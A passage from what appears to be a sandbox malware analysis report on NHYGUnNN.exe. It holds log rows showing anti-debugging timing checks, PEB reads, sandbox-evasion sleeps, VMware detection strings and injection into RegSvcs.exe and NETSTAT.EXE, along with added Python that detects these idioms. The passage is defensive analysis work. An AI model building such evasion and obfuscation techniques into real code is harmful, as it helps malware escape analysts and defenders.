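    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102)   # i386, 2 sections

    def section(name: bytes, va: int, ptr: int, size: int) -> bytes:
        return struct.pack("<8sIIIIIIHHI", name, size, va, size, ptr, 0, 0, 0, 0, 0x60000020)

    headers = (dos + b"PE\0\0" + file_hdr
               + section(b".text", 0x1000, raw0, len(packed))
               + section(b".data", 0x2000, raw0 + len(packed), len(plain)))
    headers += b"\0" * (raw0 - len(headers))       # pad up to the first raw section
    return headers + packed + plain


if __name__ == "__main__":
    scores = section_entropies(build_test_pe())
    for sec_name, e in scores.items():
        print(f"{sec_name:8} {e:.3f}")
    print("flagged:", flag_packed(scores))
```

Entropy alone does not distinguish a packer from legitimately compressed resources, so in practice the score is read together with the section's characteristics (an executable section near 8 bits per byte, as in the `.text` row here, is the strong signal) and with the run-time evidence elsewhere in this report, such as `Assembly.Load(byte[])` and the writes into RegSvcs.exe.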
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NHYGUnNN.exe TID: 5188 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4760 | Thread sleep time: -36000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013C5BA5 rdtsc
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API coverage: 6.1 %
Source: C:\Windows\SysWOW64\NETSTAT.EXE | API coverage: 9.6 %
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BD2CA0 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Thread delayed: delay time: 922337203685477
Source: NHYGUnNN.exe, 00000000.00000002.240647032.0000012A3AB7D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3Ts+
Source: NHYGUnNN.exe, 00000000.00000002.239226226.0000012A39A02000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/
Source: explorer.exe, 00000002.00000000.296608102.00000000045B0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.303615769.00000000081DD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
Source: explorer.exe, 00000002.00000000.279110893.0000000006710000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorer.exe, 00000002.00000000.282562714.00000000082B2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Prod_VMware_SATAi
Source: NHYGUnNN.exe, 00000000.00000002.240917397.0000012A3ABFE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/VphMpV3Ts+
Source: NHYGUnNN.exe, 00000000.00000002.241144747.0000012A3AC7E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %C30PR9jBAtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/VphMpV3Ts+
Source: explorer.exe, 00000002.00000000.252879418.0000000008304000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: NHYGUnNN.exe, 00000000.00000002.240357022.0000012A3AAF8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3
Source: NHYGUnNN.exe, 00000000.00000002.239851941.0000012A3AA71000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %tZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3
Source: explorer.exe, 00000002.00000000.282562714.00000000082B2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.252366258.0000000008200000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013C5BA5 rdtsc
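Three of the row groups in this section are static x86 idioms that a byte-pattern rule can pick up from raw code without running it: the push-then-return sequences earlier in the section (`push ecx; ret`, `push 793A76E7h; ret`, `pushfd ; iretd`), which are obfuscated jumps to whatever was pushed and defeat linear disassembly and call/ret pairing; the `rdtsc` rows, a timestamp-counter read taken before and after a code region so that the inflated delta under a debugger or single-stepping can be detected; and the `mov eax, dword ptr fs:[00000030h]` rows that follow, the 32-bit read of the PEB pointer from the TEB that precedes checks of fields such as `BeingDebugged`. The Python below is an added example written for this page, not part of the Joe Sandbox report and not the sample's code. It scans linearly the way a Yara rule would, not as a disassembler, so a hit inside an immediate or data is possible; register names are decoded with their 32-bit labels (the 0x52 opcode the sample's 64-bit stub uses for `push rdx` prints as `push edx`), and the input is a constructed byte string, not bytes extracted from NHYGUnNN.exe.

```python
import struct
from collections import Counter
from typing import Dict, List, Tuple

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
SEG_PUSH = {0x0E: "push cs", 0x1E: "push ds", 0x9C: "pushfd"}   # one-byte pushes seen in the report
RETURNS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}
PEB_DISP = b"\x30\x00\x00\x00"                                   # TEB+0x30 holds the PEB pointer (32-bit)

Finding = Tuple[int, str, str]   # (offset, category, instruction text)


def scan(code: bytes) -> List[Finding]:
    """Linear byte-pattern scan for the three idioms; a heuristic, not a disassembler."""
    hits: List[Finding] = []
    n, i = len(code), 0
    while i < n:
        b = code[i]
        # 0F 31: rdtsc, used in pairs to time a code region (debugger / single-step check)
        if b == 0x0F and i + 1 < n and code[i + 1] == 0x31:
            hits.append((i, "timing", "rdtsc"))
            i += 2
            continue
        # 64 A1 30000000   : mov eax, fs:[30h]  (moffs32 form)
        # 64 8B /r disp32  : mov r32, fs:[30h]  (modrm form, mod=00 rm=101)
        if b == 0x64 and i + 5 < n:
            if code[i + 1] == 0xA1 and code[i + 2:i + 6] == PEB_DISP:
                hits.append((i, "peb", "mov eax, dword ptr fs:[00000030h]"))
                i += 6
                continue
            if (code[i + 1] == 0x8B and i + 6 < n
                    and (code[i + 2] & 0xC7) == 0x05 and code[i + 3:i + 7] == PEB_DISP):
                reg = REG32[(code[i + 2] >> 3) & 7]
                hits.append((i, "peb", f"mov {reg}, dword ptr fs:[00000030h]"))
                i += 7
                continue
        # 50+r then C3/CB/CF: push r32 and return, i.e. jump to the register's value
        if 0x50 <= b <= 0x57 and i + 1 < n and code[i + 1] in RETURNS:
            hits.append((i, "push-ret", f"push {REG32[b - 0x50]}; {RETURNS[code[i + 1]]}"))
            i += 2
            continue
        # 68 imm32 then a return: jump to a constant address
        if b == 0x68 and i + 5 < n and code[i + 5] in RETURNS:
            imm = struct.unpack_from("<I", code, i + 1)[0]
            hits.append((i, "push-ret", f"push {imm:08X}h; {RETURNS[code[i + 5]]}"))
            i += 6
            continue
        # push cs / push ds / pushfd followed by a return opcode
        if b in SEG_PUSH and i + 1 < n and code[i + 1] in RETURNS:
            hits.append((i, "push-ret", f"{SEG_PUSH[b]}; {RETURNS[code[i + 1]]}"))
            i += 2
            continue
        i += 1
    return hits


def summarize(code: bytes) -> Dict[str, int]:
    """Hit count per category, the shape a triage script would report."""
    return dict(Counter(cat for _, cat, _ in scan(code)))


# Constructed input (not bytes from NHYGUnNN.exe): an anti-debug prologue
# followed by the obfuscated-return gadgets the report lists.
SAMPLE = bytes([
    0x55, 0x8B, 0xEC,                              # push ebp; mov ebp, esp
    0x64, 0xA1, 0x30, 0x00, 0x00, 0x00,            # mov eax, fs:[30h]   -> PEB
    0x8A, 0x40, 0x02,                              # mov al, [eax+2]     -> PEB.BeingDebugged
    0x64, 0x8B, 0x0D, 0x30, 0x00, 0x00, 0x00,      # mov ecx, fs:[30h]
    0x0F, 0x31,                                    # rdtsc
    0x51, 0xC3,                                    # push ecx; ret
    0x68, 0xE7, 0x76, 0x3A, 0x79, 0xC3,            # push 793A76E7h; ret
    0x9C, 0xCF,                                    # pushfd; iretd
    0x0E, 0xCB,                                    # push cs; retf
    0x5D, 0xC3,                                    # pop ebp; ret (ordinary epilogue, no hit)
])

if __name__ == "__main__":
    for off, cat, text in scan(SAMPLE):
        print(f"{off:04x}  {cat:9} {text}")
    print(summarize(SAMPLE))
```

A single `push reg; ret` is common in hand-written stubs and a lone `fs:[30h]` read appears in every CRT start-up, so neither is evidence by itself; what makes the rows in this report meaningful is the density (dozens of gadgets in RegSvcs.exe and NETSTAT.EXE, processes that should contain none of this code after being hollowed) together with the run-time injection evidence elsewhere in the report.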
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01314120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01314120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01314120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01314120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01314120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012FC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012FB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012FB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013199BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013199BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013199BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013199BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013769A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013261A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013261A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01322990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013841E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01377016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01377016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01377016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013C4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013C4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013C1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01310050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01310050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013390AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01373884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01373884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0138B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01323B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01323B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012FDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013C8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012FDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012FF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013C5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h]
